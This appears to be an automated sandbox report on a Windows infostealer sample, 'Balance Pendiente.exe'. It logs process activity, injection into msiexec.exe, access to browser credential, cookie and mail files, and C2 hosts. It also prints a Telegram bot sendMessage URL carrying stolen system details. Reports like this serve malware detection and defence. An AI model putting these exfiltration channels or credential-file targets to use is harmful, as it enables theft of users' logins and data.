            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Balance Pendiente.exeCode function: 0_2_00405B89 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405B89

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5660, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
            Source: C:\Windows\SysWOW64\msiexec.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: Yara match | File source: 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5660, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 5660, type: MEMORYSTR
            MITRE ATT&CK Matrix (techniques listed per tactic; a number preceding a technique is the badge count shown in the original matrix)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
            Execution: 1 Windows Management Instrumentation; 1 Native API; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
            Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Privilege Escalation: 1 DLL Side-Loading; 311 Process Injection; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
            Defense Evasion: 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 21 Virtualization/Sandbox Evasion; 311 Process Injection; Compile After Delivery
            Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
            Discovery: 3 File and Directory Discovery; 14 System Information Discovery; 11 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
            Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture
            Command and Control: 1 Web Service; 3 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
            Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph (ID: 1623448; Sample: Balance Pendiente.exe; Startdate: 25/02/2025; Architecture: WINDOWS; Score: 100)

            Start node
            • DNS/IP Info: reallyfreegeoip.org; api.telegram.org; 4 other IPs or domains
            • Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for dropped file; 7 other signatures
            • reallyfreegeoip.org -> Tries to detect the country of the analysis system (by using the IP)
            • api.telegram.org -> Uses the Telegram API (likely for C&C communication)
            • started: Balance Pendiente.exe [1 29]

            Process: Balance Pendiente.exe
            • dropped: C:\Users\user\AppData\Local\...\nsExec.dll, PE32
            • started: powershell.exe [30]

            Process: powershell.exe
            • dropped: C:\Users\user\...\Balance Pendiente.exe, PE32
            • dropped: C:\...\Balance Pendiente.exe:Zone.Identifier, ASCII
            • Signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 3 other signatures
            • started: msiexec.exe [15 8]; conhost.exe

            Process: msiexec.exe
            • DNS/IP Info: api.telegram.org 149.154.167.220, 443, 49905 TELEGRAMRU United Kingdom; checkip.dyndns.com 158.101.44.242, 49812, 49830, 49842 ORACLE-BMC-31898US United States; 3 other IPs or domains
            • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

            Source | Detection | Scanner | Label
            Balance Pendiente.exe | 44% | Virustotal |
            Balance Pendiente.exe | 38% | ReversingLabs | Win32.Trojan.Generic

            Source | Detection | Scanner | Label
            C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll | 0% | ReversingLabs |
            C:\Users\user\AppData\Local\Temp\nsu1A01.tmp\nsExec.dll | 0% | Virustotal |
            C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe | 38% | ReversingLabs | Win32.Trojan.Generic
            C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Balance Pendiente.exe | 44% | Virustotal |

            No Antivirus matches
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            drive.google.com | 172.217.18.14 | true | false | | high
            drive.usercontent.google.com | 142.250.185.193 | true | false | | high
            reallyfreegeoip.org | 104.21.96.1 | true | false | | high
            api.telegram.org | 149.154.167.220 | true | false | | high
            checkip.dyndns.com | 158.101.44.242 | true | false | | high
            checkip.dyndns.org | unknown | unknown | false | | high
            Name | Malicious | Antivirus Detection | Reputation
            https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
            http://checkip.dyndns.org/ | false | | high
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2025/02/2025%20/%2014:12:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://duckduckgo.com/chrome_newtab | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://duckduckgo.com/ac/?q= | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://api.telegram.org | msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://api.telegram.org/bot | msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/License | powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | msiexec.exe, 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022ECB000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022E56000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.00000000230FD000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022FFA000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022EA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://chrome.google.com/webstore?hl=en | msiexec.exe, 00000006.00000002.2993742272.0000000021F40000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://varders.kozow.com:8081 | msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.office.com/lBdq | msiexec.exe, 00000006.00000002.2993742272.0000000021F6C000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.google.com | msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://drive.google.com/ | msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install | msiexec.exe, 00000006.00000002.2996723213.0000000022EA6000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022E5C000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000023000000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022FD5000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022E31000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.00000000230D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/ | powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://apis.google.com | msiexec.exe, 00000006.00000003.2311914862.0000000006386000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2160143305.0000000004761000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://reallyfreegeoip.org/xml/ | msiexec.exe, 00000006.00000002.2993742272.0000000021DCC000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.office.com/ | msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://drive.google.com/: | msiexec.exe, 00000006.00000002.2981936990.00000000062CA000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://contoso.com/Icon | powershell.exe, 00000001.00000002.2165973491.00000000057C8000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20a | msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://drive.usercontent.google.com/ | msiexec.exe, 00000006.00000003.2349911508.0000000006381000.00000004.00000020.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2981936990.0000000006342000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://checkip.dyndns.org | msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://chrome.google.com/webstore?hl=en4 | msiexec.exe, 00000006.00000002.2993742272.0000000021F40000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | msiexec.exe, 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022ECB000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022E56000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.00000000230FD000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022FFA000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp; msiexec.exe, 00000006.00000002.2996723213.0000000022EA4000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://nsis.sf.net/NSIS_ErrorError | Balance Pendiente.exe, Balance Pendiente.exe.1.dr | false | | high
            https://api.telegram.org/bot/sendMessage?chat_id=&text= | msiexec.exe, 00000006.00000002.2993742272.0000000021E62000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.ecosia.org/newtab/ | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://aborters.duckdns.org:8081 | msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://ac.ecosia.org/autocomplete?q= | msiexec.exe, 00000006.00000002.2996723213.0000000023048000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://nsis.sf.net/NSIS_Error | Balance Pendiente.exe, Balance Pendiente.exe.1.dr | false | | high
            https://chrome.google.com/webstore?hl=enlBdq | msiexec.exe, 00000006.00000002.2993742272.0000000021F3B000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://www.office.com/4 | msiexec.exe, 00000006.00000002.2993742272.0000000021F71000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://crl.micro | powershell.exe, 00000001.00000002.2167965758.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://ion=v4.5 | powershell.exe, 00000001.00000002.2167965758.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp | false | | high
            http://anotherarmy.dns.army:8081 | msiexec.exe, 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp | false | | high
            https://aka.ms/pscore6lBdq | powershell.exe, 00000001.00000002.2160143305.0000000004761000.00000004.00000800.00020000.00000000.sdmp | false | | high
            http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000001.00000002.2160143305.00000000048B6000.00000004.00000800.00020000.00000000.sdmp | false | | high
